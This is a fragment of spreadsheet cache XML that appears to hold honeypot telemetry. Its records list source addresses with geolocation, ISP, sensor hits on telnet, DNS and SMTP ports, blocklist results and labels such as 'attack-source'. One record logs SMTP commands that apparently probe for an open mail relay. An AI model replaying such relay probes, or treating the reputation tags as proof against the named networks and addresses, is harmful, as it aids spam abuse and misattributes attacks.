    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="14"/>
    <s v="Donetsk"/>
    <s v="Kramatorsk Raion"/>
    <s v="Kramatorsk"/>
    <s v="704508"/>
    <s v="NA"/>
    <s v="48.739"/>
    <s v="37.5844"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="Golden Telecom LLC"/>
    <s v="2010-05-17"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e77:4213"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2768"/>
    <x v="2768"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T08:24:05"/>
    <d v="2025-04-07T08:24:05"/>
    <d v="2025-04-07T08:24:05"/>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3b5c:c068"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2769"/>
    <x v="2769"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T08:17:56"/>
    <d v="2025-03-20T13:17:28"/>
    <d v="2025-04-07T08:17:56"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BSNL-GSM-SouthZone"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75db:a71b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2770"/>
    <x v="2770"/>
    <s v="nk219-91-56-93.adsl.dynamic.apol.com.tw&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-07T08:17:18"/>
    <d v="2025-04-06T08:05:59"/>
    <d v="2025-04-07T08:17:18"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0501"/>
    <s v="121.565"/>
    <s v="131627"/>
    <s v="Peicity Digital Cable Television., LTD"/>
    <s v="Peicity Digital Cable Television., LTD"/>
    <s v="residential"/>
    <s v="Asia Pacific On-line Services Inc."/>
    <s v="None"/>
    <s v="APOL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:db5b:385d"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2771"/>
    <x v="2771"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T08:01:49"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-07T08:01:49"/>
    <n v="147"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_DNS_H4&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H39"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;53&amp;&amp;47037&amp;&amp;40394&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:25e5:47c1"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2772"/>
    <x v="2772"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T08:01:20"/>
    <d v="2023-09-21T04:46:15"/>
    <d v="2025-04-07T08:01:20"/>
    <n v="129"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_SSH_H7&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_MT-CPA_H19"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;51711&amp;&amp;60672&amp;&amp;48268&amp;&amp;19147&amp;&amp;47404&amp;&amp;60969&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="14"/>
    <s v="Donetsk"/>
    <s v="Kramatorsk Raion"/>
    <s v="Kramatorsk"/>
    <s v="704508"/>
    <s v="NA"/>
    <s v="48.739"/>
    <s v="37.5844"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="Golden Telecom LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e77:425a"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2773"/>
    <x v="2773"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T07:47:19"/>
    <d v="2024-12-06T02:24:08"/>
    <d v="2025-04-07T07:47:19"/>
    <n v="91"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H39"/>
    <s v="23&amp;&amp;57042&amp;&amp;NA&amp;&amp;41040"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2010-11-10"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2eb9:75de"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2774"/>
    <x v="2774"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T07:43:11"/>
    <d v="2025-04-07T07:43:11"/>
    <d v="2025-04-07T07:43:11"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="MTNL Mumbai"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb4:ab26"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2775"/>
    <x v="2775"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T07:33:40"/>
    <d v="2024-12-14T14:41:35"/>
    <d v="2025-04-07T07:33:40"/>
    <n v="61"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="23&amp;&amp;38713"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="MI"/>
    <s v="Michigan"/>
    <s v="Isabella"/>
    <s v="Mount Pleasant"/>
    <s v="5002714"/>
    <s v="48858"/>
    <s v="43.6079"/>
    <s v="-84.7673"/>
    <s v="17143"/>
    <s v="Winn Telecom"/>
    <s v="Winn Telecom"/>
    <s v="business"/>
    <s v="Winn Telecom"/>
    <s v="2008-10-20"/>
    <s v="WINN-TELECOM-INET-200810"/>
    <s v="2012-03-02"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:43d1:f404"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2776"/>
    <x v="2776"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T07:24:04"/>
    <d v="2025-04-07T07:24:04"/>
    <d v="2025-04-07T07:24:04"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>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8:6a1e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2777"/>
    <x v="2777"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T07:09:32"/>
    <d v="2025-04-07T07:09:32"/>
    <d v="2025-04-07T07:09:32"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="23"/>
    <s v="Tehran"/>
    <s v="Shahrestān-e Tehrān"/>
    <s v="Tehran"/>
    <s v="112931"/>
    <s v="NA"/>
    <s v="35.7477"/>
    <s v="51.4021"/>
    <s v="50810"/>
    <s v="Mobinnet-AS"/>
    <s v="Mci"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b283:1470"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2778"/>
    <x v="2778"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T07:01:34"/>
    <d v="2024-05-28T00:57:58"/>
    <d v="2025-04-07T07:01:34"/>
    <n v="253"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;34468&amp;&amp;60354&amp;&amp;29252&amp;&amp;43391&amp;&amp;43392&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2012-04-10"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:25e5:f412"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2779"/>
    <x v="2779"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T06:25:36"/>
    <d v="2025-04-07T06:25:36"/>
    <d v="2025-04-07T06:25:36"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="JM"/>
    <s v="Jamaica"/>
    <s v="02"/>
    <s v="Saint Andrew Parish"/>
    <s v="Trench Town"/>
    <s v="Kingston"/>
    <s v="3489854"/>
    <s v="10"/>
    <s v="17.9892"/>
    <s v="-76.8024"/>
    <s v="11580"/>
    <s v="ISLAND-NETWORKS-LTD"/>
    <s v="Island Networks Ltd"/>
    <s v="corporate"/>
    <s v="Agis"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cda4:cd2a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2780"/>
    <x v="2780"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T06:02:58"/>
    <d v="2025-04-03T20:37:30"/>
    <d v="2025-04-07T06:02:58"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cf:a6fa"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2781"/>
    <x v="2781"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T06:01:55"/>
    <d v="2025-02-10T21:37:02"/>
    <d v="2025-04-07T06:01:55"/>
    <n v="101"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_SMTP_H8&amp;&amp;SMA-LAB_SMTP_HC1"/>
    <s v="25&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="NH"/>
    <s v="North Holland"/>
    <s v="Gemeente Amsterdam"/>
    <s v="Amsterdam"/>
    <s v="2759794"/>
    <s v="1012"/>
    <s v="52.3676"/>
    <s v="4.90414"/>
    <s v="214940"/>
    <s v="KPROHOST LLC"/>
    <s v="Kprohost LLC"/>
    <s v="hosting"/>
    <s v="Kprohost"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '109.123.229.33_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Mon, 10 Feb 2025 17:07:04 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '109.123.229.33_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Fri, 14 Feb 2025 23:51:48 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sat, 22 Feb 2025 15:05:35 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '45.14.244.111_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Tue, 25 Feb 2025 07:35:30 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '95.164.21.98_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sun, 2 Mar 2025 16:09:29 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Tue, 4 Mar 2025 03:04:20 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Tue, 4 Mar 2025 03:31:33 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Tue, 4 Mar 2025 09:54:41 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '66.94.127.183_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Thu, 6 Mar 2025 12:24:28 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d90:d454"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2782"/>
